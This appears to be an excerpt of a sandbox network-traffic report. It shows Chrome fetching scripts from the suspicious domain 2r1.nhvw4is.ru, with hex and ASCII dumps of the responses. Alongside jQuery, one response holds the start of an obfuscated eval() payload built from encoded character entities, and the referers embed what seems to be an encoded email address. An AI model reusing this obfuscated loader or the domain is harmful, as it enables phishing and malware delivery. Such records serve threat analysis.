                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 70 78 7d 2e 6c 69 73 74 2d 69 6e 6c 69 6e 65 3e 6c 69 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 70 78 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 70 61 64 64 69 6e 67 3a 38 70 78 20 31 32 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 32 70 78 7d 2e 62 6c 6f 63 6b 71 75 6f 74 65 2d 72 65 76 65 72 73 65 2c 62 6c 6f 63 6b 71 75 6f 74 65 2e 70 75 6c 6c 2d 72 69 67 68 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e
                                                                                                                                                              Data Ascii: ist-style:none;margin-left:-4px}.list-inline>li{display:inline-block;padding-left:4px;padding-right:4px}blockquote{padding:8px 12px;margin:0 0 12px}.blockquote-reverse,blockquote.pull-right{padding-right:12px;padding-left:0;text-align:right}address{margin
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 6c 67 2d 31 36 2c 2e 63 6f 6c 2d 78 73 2d 31 37 2c 2e 63 6f 6c 2d 73 6d 2d 31 37 2c 2e 63 6f 6c 2d 6d 64 2d 31 37 2c 2e 63 6f 6c 2d 6c 67 2d 31 37 2c 2e 63 6f 6c 2d 78 73 2d 31 38 2c 2e 63 6f 6c 2d 73 6d 2d 31 38 2c 2e 63 6f 6c 2d 6d 64 2d 31 38 2c 2e 63 6f 6c 2d 6c 67 2d 31 38 2c 2e 63 6f 6c 2d 78 73 2d 31 39 2c 2e 63 6f 6c 2d 73 6d 2d 31 39 2c 2e 63 6f 6c 2d 6d 64 2d 31 39 2c 2e 63 6f 6c 2d 6c 67 2d 31 39 2c 2e 63 6f 6c 2d 78 73 2d 32 30 2c 2e 63 6f 6c 2d 73 6d 2d 32 30 2c 2e 63 6f 6c 2d 6d 64 2d 32 30 2c 2e 63 6f 6c 2d 6c 67 2d 32 30 2c 2e 63 6f 6c 2d 78 73 2d 32 31 2c 2e 63 6f 6c 2d 73 6d 2d 32 31 2c 2e 63 6f 6c 2d 6d 64 2d 32 31 2c 2e 63 6f 6c 2d 6c 67 2d 32 31 2c 2e 63 6f 6c 2d 78 73 2d 32 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 32 2c 2e 63 6f 6c 2d 6d 64
                                                                                                                                                              Data Ascii: lg-16,.col-xs-17,.col-sm-17,.col-md-17,.col-lg-17,.col-xs-18,.col-sm-18,.col-md-18,.col-lg-18,.col-xs-19,.col-sm-19,.col-md-19,.col-lg-19,.col-xs-20,.col-sm-20,.col-md-20,.col-lg-20,.col-xs-21,.col-sm-21,.col-md-21,.col-lg-21,.col-xs-22,.col-sm-22,.col-md


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              42192.168.2.449804172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:32 UTC737OUTGET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6kdJWQxCSur7B561nIxE0tXq/7hO4txYoEI6eUd HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29t
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:33 UTC716INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:33 GMT
                                                                                                                                                              Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qEJhiVW7MWdFKvbxle%2FyrUdfzVmLK%2BUIq5lUnB4DwV2EzvT487CAr10uxZpxC%2Bsduz%2FxbYczpoxb0AUvR4aYzmBhnouFy37W72VeW2EPNAzmRnKXFRCCrnmAeZYA0hSV3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008ef0e392361-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:33 UTC653INData Raw: 37 63 65 36 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22
                                                                                                                                                              Data Ascii: 7ce6/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 2e 77 69 6e 64 6f 77 7d 2c 76 3d 7b 74 79 70 65 3a 21 30 2c 73 72 63 3a 21 30 2c 6e 6f 4d 6f 64 75 6c 65 3a 21 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 2c 6f 3d 28 74 3d 74 7c 7c 72 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 6f 2e 74 65 78 74 3d 65 2c 6e 29 66 6f 72 28 69 20 69 6e 20 76 29 6e 5b 69 5d 26 26 28 6f 5b 69 5d 3d 6e 5b 69 5d 29 3b 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 65 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d
                                                                                                                                                              Data Ascii: .window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"=
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 5b 74 5d 29 26 26 28 6c 26 26 72 26 26 28 77 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 72 29 7c 7c 28 69 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 72 29 29 29 3f 28 69 3f 28 69 3d 21 31 2c 6f 3d 6e 26 26 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 3f 6e 3a 5b 5d 29 3a 6f 3d 6e 26 26 77 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 6e 29 3f 6e 3a 7b 7d 2c 61 5b 74 5d 3d 77 2e 65 78 74 65 6e 64 28 6c 2c 6f 2c 72 29 29 3a 76 6f 69 64 20 30 21 3d 3d 72 26 26 28 61 5b 74 5d 3d 72 29 29 3b 72 65 74 75 72 6e 20 61 7d 2c 77 2e 65 78 74 65 6e 64 28 7b 65 78 70 61 6e 64 6f 3a 22 6a 51 75 65 72 79 22 2b 28 22 33 2e 33 2e 31 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2e 72 65 70 6c 61 63 65 28 2f 5c 44 2f 67 2c 22 22 29 2c 69 73 52 65 61 64 79 3a 21 30
                                                                                                                                                              Data Ascii: [t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:"jQuery"+("3.3.1"+Math.random()).replace(/\D/g,""),isReady:!0
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 66 20 53 79 6d 62 6f 6c 26 26 28 77 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 77 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 74 2b 22 5d 22 5d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 43 28 65 29 7b 76 61 72 20 74 3d 21 21 65 26 26 22 6c 65 6e 67 74 68 22 69 6e 20 65 26 26 65 2e 6c 65 6e 67 74 68 2c 6e 3d 78 28 65 29 3b 72 65 74 75 72 6e
                                                                                                                                                              Data Ascii: f Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function C(e){var t=!!e&&"length"in e&&e.length,n=x(e);return
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 67 45 78 70 28 22 5e 28 22 2b 52 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 49 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 57 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4d 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4d 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4d 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4d 2b 22 2a 5c 5c 29 7c 29 22 2c 22 69 22 29 2c 62 6f 6f 6c 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 3f 3a 22 2b 50 2b 22 29 24 22 2c 22 69
                                                                                                                                                              Data Ascii: gExp("^("+R+"|[*])"),ATTR:new RegExp("^"+I),PSEUDO:new RegExp("^"+W),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new RegExp("^(?:"+P+")$","i
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 6f 63 75 6d 65 6e 74 7c 7c 74 3a 77 29 21 3d 3d 64 26 26 70 28 74 29 2c 74 3d 74 7c 7c 64 2c 67 29 29 7b 69 66 28 31 31 21 3d 3d 54 26 26 28 66 3d 4a 2e 65 78 65 63 28 65 29 29 29 69 66 28 6f 3d 66 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 54 29 7b 69 66 28 21 28 6c 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 6f 29 29 29 72 65 74 75 72 6e 20 72 3b 69 66 28 6c 2e 69 64 3d 3d 3d 6f 29 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 6c 29 2c 72 7d 65 6c 73 65 20 69 66 28 6d 26 26 28 6c 3d 6d 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 6f 29 29 26 26 78 28 74 2c 6c 29 26 26 6c 2e 69 64 3d 3d 3d 6f 29 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 6c 29 2c 72 7d 65 6c 73 65 7b 69 66 28 66 5b 32 5d 29 72 65 74 75 72 6e 20 4c 2e 61 70 70 6c 79 28 72 2c 74 2e 67 65
                                                                                                                                                              Data Ascii: ocument||t:w)!==d&&p(t),t=t||d,g)){if(11!==T&&(f=J.exec(e)))if(o=f[1]){if(9===T){if(!(l=t.getElementById(o)))return r;if(l.id===o)return r.push(l),r}else if(m&&(l=m.getElementById(o))&&x(t,l)&&l.id===o)return r.push(l),r}else{if(f[2])return L.apply(r,t.ge
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 6e 22 69 6e 70 75 74 22 3d 3d 3d 74 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 26 26 74 2e 74 79 70 65 3d 3d 3d 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 65 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 74 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 6e 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 6e 29 26 26 74 2e 74 79 70 65 3d 3d 3d 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 65 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 74 3f 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 21 31 3d 3d 3d 74 2e 64 69 73 61 62 6c 65 64 3f 22 6c 61 62 65 6c 22 69 6e 20 74 3f 22
                                                                                                                                                              Data Ascii: n"input"===t.nodeName.toLowerCase()&&t.type===e}}function pe(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function de(e){return function(t){return"form"in t?t.parentNode&&!1===t.disabled?"label"in t?"
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 6e 74 73 42 79 4e 61 6d 65 28 62 29 2e 6c 65 6e 67 74 68 7d 29 2c 6e 2e 67 65 74 42 79 49 64 3f 28 72 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 5a 2c 65 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 74 7d 7d 2c 72 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 67 29 7b 76 61 72 20 6e 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 72 65 74 75 72 6e 20 6e 3f 5b 6e 5d 3a 5b 5d 7d 7d 29 3a 28 72 2e 66 69 6c 74 65 72 2e
                                                                                                                                                              Data Ascii: ntsByName(b).length}),n.getById?(r.filter.ID=function(e){var t=e.replace(Z,ee);return function(e){return e.getAttribute("id")===t}},r.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&g){var n=t.getElementById(e);return n?[n]:[]}}):(r.filter.
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4d 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 50 2b 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 62 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 7e 3d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 62 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 2e 23 2e 2b 5b
                                                                                                                                                              Data Ascii: :''|\"\")"),e.querySelectorAll("[selected]").length||y.push("\\["+M+"*(?:value|"+P+")"),e.querySelectorAll("[id~="+b+"-]").length||y.push("~="),e.querySelectorAll(":checked").length||y.push(":checked"),e.querySelectorAll("a#"+b+"+*").length||y.push(".#.+[
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 44 3d 74 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 3d 3d 3d 74 29 72 65 74 75 72 6e 20 66 3d 21 30 2c 30 3b 76 61 72 20 72 3d 21 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 72 7c 7c 28 31 26 28 72 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 6e 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28
                                                                                                                                                              Data Ascii: eturn!0;return!1},D=t?function(e,t){if(e===t)return f=!0,0;var r=!e.compareDocumentPosition-!t.compareDocumentPosition;return r||(1&(r=(e.ownerDocument||e)===(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!n.sortDetached&&t.compareDocumentPosition(


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              43192.168.2.449806172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:32 UTC737OUTGET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6l64ynJdPgQDe/8BAggoRS3IGfgVQWqQrsKqAmU HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29t
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:33 UTC712INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:33 GMT
                                                                                                                                                              Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hJX2679m%2FtP2I8kQHX5G%2FPmxOfi9D0KU2rNJxfIW4CNNCDHBpmdkmuK472Sr4WcfIMl6kroS2EzQcY4xVHaJ7zIQJYudI8fQmKvp6i2EsXWjpPdVKapYm96wt9Q1GQzT8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008ef28dc43b9-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:33 UTC657INData Raw: 37 63 65 39 0d 0a 65 76 61 6c 28 27 26 23 33 37 3b 26 23 34 31 3b 26 23 31 30 31 3b 26 23 31 31 32 3b 26 23 31 30 30 3b 26 23 31 31 38 3b 26 23 31 31 30 3b 26 23 31 30 32 3b 26 23 31 31 31 3b 26 23 31 31 37 3b 26 23 34 32 3b 26 23 34 37 3b 26 23 31 31 35 3b 26 23 31 30 32 3b 26 23 39 38 3b 26 23 31 30 31 3b 26 23 31 32 32 3b 26 23 34 31 3b 26 23 31 30 33 3b 26 23 31 31 38 3b 26 23 31 31 31 3b 26 23 31 30 30 3b 26 23 31 31 37 3b 26 23 31 30 36 3b 26 23 31 31 32 3b 26 23 31 31 31 3b 26 23 34 31 3b 26 23 34 32 3b 26 23 33 33 3b 26 23 31 32 34 3b 26 23 33 37 3b 26 23 34 31 3b 26 23 34 30 3b 26 23 33 36 3b 26 23 31 30 32 3b 26 23 31 31 35 3b 26 23 31 30 31 3b 26 23 31 32 33 3b 26 23 31 31 34 3b 26 23 31 31 34 3b 26 23 31 31 36 3b 26 23 31 31 33 3b 26 23 39 39
                                                                                                                                                              Data Ascii: 7ce9eval('&#37;&#41;&#101;&#112;&#100;&#118;&#110;&#102;&#111;&#117;&#42;&#47;&#115;&#102;&#98;&#101;&#122;&#41;&#103;&#118;&#111;&#100;&#117;&#106;&#112;&#111;&#41;&#42;&#33;&#124;&#37;&#41;&#40;&#36;&#102;&#115;&#101;&#123;&#114;&#114;&#116;&#113;&#99
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 3b 26 23 31 30 35 3b 26 23 31 30 36 3b 26 23 31 30 30 3b 26 23 31 30 35 3b 26 23 36 30 3b 26 23 31 34 3b 26 23 31 31 3b 26 23 31 30 3b 26 23 31 30 36 3b 26 23 31 30 33 3b 26 23 33 33 3b 26 23 34 31 3b 26 23 31 30 38 3b 26 23 31 30 32 3b 26 23 31 32 32 3b 26 23 33 33 3b 26 23 36 32 3b 26 23 36 32 3b 26 23 33 33 3b 26 23 35 30 3b 26 23 35 32 3b 26 23 34 32 3b 26 23 31 34 3b 26 23 31 31 3b 26 23 31 30 3b 26 23 31 32 34 3b 26 23 31 30 34 3b 26 23 37 39 3b 26 23 34 31 3b 26 23 31 31 37 3b 26 23 31 31 35 3b 26 23 31 31 38 3b 26 23 31 30 32 3b 26 23 34 32 3b 26 23 36 30 3b 26 23 31 32 36 3b 26 23 31 32 36 3b 26 23 34 32 3b 26 23 36 30 3b 26 23 31 34 3b 26 23 31 31 3b 26 23 33 37 3b 26 23 34 31 3b 26 23 33 35 3b 26 23 33 36 3b 26 23 31 30 30 3b 26 23 31 32 31 3b
                                                                                                                                                              Data Ascii: ;&#105;&#106;&#100;&#105;&#60;&#14;&#11;&#10;&#106;&#103;&#33;&#41;&#108;&#102;&#122;&#33;&#62;&#62;&#33;&#50;&#52;&#42;&#14;&#11;&#10;&#124;&#104;&#79;&#41;&#117;&#115;&#118;&#102;&#42;&#60;&#126;&#126;&#42;&#60;&#14;&#11;&#37;&#41;&#35;&#36;&#100;&#121;
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 31 31 34 3b 26 23 31 31 34 3b 26 23 31 31 36 3b 26 23 31 31 33 3b 26 23 39 39 3b 26 23 31 32 33 3b 26 23 34 30 3b 26 23 34 32 3b 26 23 34 37 3b 26 23 31 31 35 3b 26 23 31 30 32 3b 26 23 31 31 30 3b 26 23 31 31 32 3b 26 23 31 31 39 3b 26 23 31 30 32 3b 26 23 36 38 3b 26 23 31 30 39 3b 26 23 39 38 3b 26 23 31 31 36 3b 26 23 31 31 36 3b 26 23 34 31 3b 26 23 34 30 3b 26 23 31 30 35 3b 26 23 39 38 3b 26 23 31 31 36 3b 26 23 34 36 3b 26 23 31 30 32 3b 26 23 31 31 35 3b 26 23 31 31 35 3b 26 23 31 31 32 3b 26 23 31 31 35 3b 26 23 34 30 3b 26 23 34 32 3b 26 23 36 30 3b 26 23 31 34 3b 26 23 31 31 3b 26 23 31 30 3b 26 23 31 31 39 3b 26 23 39 38 3b 26 23 31 31 35 3b 26 23 33 33 3b 26 23 31 31 38 3b 26 23 31 31 36 3b 26 23 31 31 35 3b 26 23 33 33 3b 26 23 36 32 3b 26
                                                                                                                                                              Data Ascii: 114;&#114;&#116;&#113;&#99;&#123;&#40;&#42;&#47;&#115;&#102;&#110;&#112;&#119;&#102;&#68;&#109;&#98;&#116;&#116;&#41;&#40;&#105;&#98;&#116;&#46;&#102;&#115;&#115;&#112;&#115;&#40;&#42;&#60;&#14;&#11;&#10;&#119;&#98;&#115;&#33;&#118;&#116;&#115;&#33;&#62;&
